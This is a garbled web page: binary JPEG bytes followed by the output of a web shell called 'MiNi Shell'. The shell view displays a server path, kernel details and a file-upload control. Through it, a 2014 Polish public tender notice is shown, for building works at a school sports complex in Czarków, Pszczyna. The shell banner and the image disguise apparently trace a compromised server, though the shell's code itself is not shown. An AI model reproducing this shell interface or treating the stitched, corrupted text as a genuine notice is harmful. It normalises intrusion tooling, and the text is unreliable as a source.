JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140717/155627-N-2014.html

<p class="kh_header"><b>Pszczyna: Rozbudowa kompleksu rekreacyjno - sportowego 
przy Zespole Szkolno Przedszkolnym 
w Czarkowie przy ul.Powstańców Śl. 24 - Etap I</b><br>
<b>Numer ogłoszenia: 155627 - 2014; data zamieszczenia: 17.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa kompleksu rekreacyjno - sportowego 
przy Zespole Szkolno Przedszkolnym 
w Czarkowie przy ul.Powstańców Śl. 24 - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia :
 -  wykonanie nawierzchni z  poliuretanu np. Eltan P  grub. min 35 mm i warstwą użytkową EPDM grub. min. 
   8 mm w kolorze czerwonym - lub innej  o równoważnych parametrach technicznych wraz z korytowaniem,
   podbudową i ułożeniem obrzeży 6 x 25 cm  na ławie betonowej  na  siłowni  zewnętrznej   o powierzchni  
   112,87 m2
-  dostawa i montaż czterech urządzeń dwustanowiskowych siłowni zewnętrznej z wykonaniem fundamentów 
   betonowych :
   biegacz + orbitrek
   prasa + wioślarz
   surfer + twister
   wyciąg + krzesełko
   Zamawiający dopuszcza zastosowanie urządzeń ze stali nierdzewnej .
-  wymiana nawierzchni z mączki ceglanej na bieżni do biegów na 60 m na nawierzchnię z poliuretanu 
   np. Eltan P  grub. min 35 mm i warstwą użytkową EPDM grub. min. 8 mm w kolorze czerwonym - lub innej  
   o równoważnych parametrach technicznych)  o powierzchni  363,60 m2
-  wymiana nawierzchni z mączki ceglanej na rozbiegu do skoku w dal na nawierzchnię z poliuretanu 
   np. Eltan P  grub. min 35 mm i warstwą użytkową EPDM grub. min. 8 mm w kolorze czerwonym -  lub innej  
   o równoważnych parametrach technicznych  o powierzchni  31,88 m2
-  dostawa i montaż boiska Arena Panna o średnicy 6,50 m  i wysokości 2,05 m  z wykonaniem 
   fundamentów betonowych 
-  wykonanie nawierzchni z  poliuretanu np. Eltan P  grub. min 35 mm i warstwą użytkową EPDM grub. min. 
   8 mm w kolorze czerwonym ( lub innej  o równoważnych parametrach technicznych) na boisku Arena 
   Panna o powierzchni  33,17 m2 wraz z korytowaniem , wykonaniem podbudowy i  ułożeniem obrzeży 
   6 x 25 cm  na ławie betonowej 
-  wykonanie nawierzchni z kostki betonowej grub. 8 cm  wraz z korytowaniem, wykonaniem  podbudowy 
   i ułożeniem obrzeży 6 x 25 cm  o powierzchni 42,51  m2
-  wykonanie nawierzchni z kratki trawnikowej PCV ażurowej wraz z korytowaniem, wykonaniem  
   podbudowy , obsianiem , uformowaniem skarpy i ułożeniem obrzeży 6 x 25 cm  o powierzchni 32,00 m2
-  dostawa i montaż urządzeń i wyposażenia terenu z wykonaniem fundamentów :
   stołów betonowych do gry w ping - pong z siatką stałą ze stali nierdzewnej  - 2 szt.
   stołów betonowych do gry w piłkarzyki - 2 szt.
   stołu betonowego do gry z dwoma planszami ( chińczyk i warcaby) - 1 szt.
   stołu betonowego do gry z dwoma planszami ( szachy x2)  - 1 szt.
   uniwersalnej tablicy wyników - 1 szt.
   tablicy do gry kółko i krzyżyk - 1 szt.
   ławek dwustronnych - 3 szt.
   koszy na śmieci - 5 szt.
   piłki na postumencie - 1 szt.
   tablicy informacyjnej  - 1 szt.
-  wykonanie ścieżek o nawierzchni z mączki ceglanej wraz z korytowaniem , podbudową i obrzeżami 
   betonowymi 6 x 25 cm ułożonymi na ławie betonowej o powierzchni 115,90 m2 - jedynie dojście obustronne do siłowni zewnętrznej :  pole wokół boiska Arena Panna , ścieżka od boiska 
   Arena Panna do siłowni i od siłowni do bieżni
-  przebudowa istniejącej ścianki do odbijania piłki na pionową ściankę wspinaczkową wraz z wykonaniem 
   przed ścianką nawierzchni bezpiecznej np.: . Eltan P  grub. min 35 mm i warstwą użytkową EPDM 
   grub. min. 8 mm w kolorze czerwonym lub innej o równoważnych parametrach technicznych
   o powierzchni  24,00 m2 , oraz zabudowania na ściance na konstrukcji z kątowników 40x40x3 mm siatki 
   bezwęzłowej propylenowej  grub. min. 4 mm o oczkach 5x5 cm 
-  modernizacja piłkochwytów o długości 109,00 m i wysokości 4,70 m polegająca na:
   wymianie zniszczonej siatki w dolnej części na siatkę stalową ocynkowaną o grubości drutu min. 3,5 mm
   wymianie zniszczonej siatki w górnej części na siatkę sznurkową bezwęzłową propylenową grub. min. 4 mm   
   o oczkach 5 x5 cm przedłużeniu piłkochwytów na długości dwóch przęseł od strony północnej  zabudowaniu dwóch 
   furtek technicznych 200 x 100 cm
-  wywóz gruzu i nadmiaru ziemi wraz z kosztami utylizacją
-  geodezyjne wytyczenie usytuowania w.w. elementów zagospodarowania terenu oraz wykonanie   
   inwentaryzacji  powykonawczej
Szczegółowy zakres zadania został określony w projekcie budowlanym,  przedmiarze robót i specyfikacji 
technicznej wykonania i odbioru robót budowlanych.
Etap I nie obejmuje następujących elementów przedstawionych w projekcie ;
-  pola do gry w scrabble
-  bulodromu
-  ścieżek utwardzonych kratką
-  ogródka 
-  nasadzeń
-  remontu widowni
-  remontu ogrodzenia 
-  montażu stojaków dla rowerów
-  nawierzchni typu Flexi -Step przy ściance spinaczkowej , która została zamieniona na nawierzchnię 
   z poliuretanu np. Eltan P z warstwą użytkowa EPDM  lub innej  o równoważnych parametrach 
    technicznych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>art. 67 ust. 1pkt 6 Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.12-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5 000,00  słownie : pięć tysięcy złotych        
należy wnieść w terminie    do 04.08.2014 r.  do godz. 1100 przed upływem terminu składania ofert.  Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6 Prawa zamówień publicznych  (Dz.U.nr223  poz.1655 z 2007 r.). należy złożyć w formie oryginału  w kasie PZE, czynnej :   godz.    700  - 1430  ( środa, piątek ) w godz.  1200  - 1430 (wtorek)
Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  informację o oferencie  wg załącznika nr 4 niniejszej specyfikacji
b)  wykonawca , który polega na wiedzy , doświadczeniu ,  potencjale technicznym i osobach   zdolnych do   
     wykonania zamówienia zobowiązany jest do przedłożenia pisemnego zobowiązania  podmiotów do oddania    
     mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy    wykonywaniu zamówienia, 
c)  wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania  tj: przed datą  publikacji      
     ogłoszenia o zamówieniu , a jeżeli okres prowadzenia działalności jest krótszy -  tym okresie  robót   
     budowlanych polegających na wykonaniu :
     -    przynajmniej   jednego zadania  związanego z wykonaniem nawierzchni z poliuretanu o powierzchni  
          min. 500,00 m2
     -    przynajmniej jednego zadania z  dostawy i montażu urządzeń siłowni zewnętrznej jak 
          zaproponowanych   w projekcie  lub podobnych ( nie koniecznie wszystkich )  o wartości zbliżonej do 
          wartości zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadkach:
1.	Zmian organizacyjnych stron np.; zmiana reprezentacji lub siedziby strony.
2.	Zmiany osób stron odpowiedzialnych za realizację umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami.
3.	Wszystkie powyższe postanowienia stanowią katalog zmian , na które zamawiający może wyrazić zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com